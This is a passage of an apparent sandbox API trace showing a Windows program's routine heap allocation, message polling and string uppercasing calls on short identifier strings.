RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x71c1) returned 0x24bec18 [0266.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0266.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0266.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0266.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0266.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0266.087] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0266.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.088] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0266.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.088] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0266.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.090] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0266.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0266.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.092] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0266.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0266.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.094] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.094] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.094] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.094] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.095] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.095] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0266.095] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0266.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0266.096] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0266.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.096] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.097] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.097] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0266.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0266.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0266.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0266.098] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0266.098] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.099] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0266.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0266.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0266.099] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 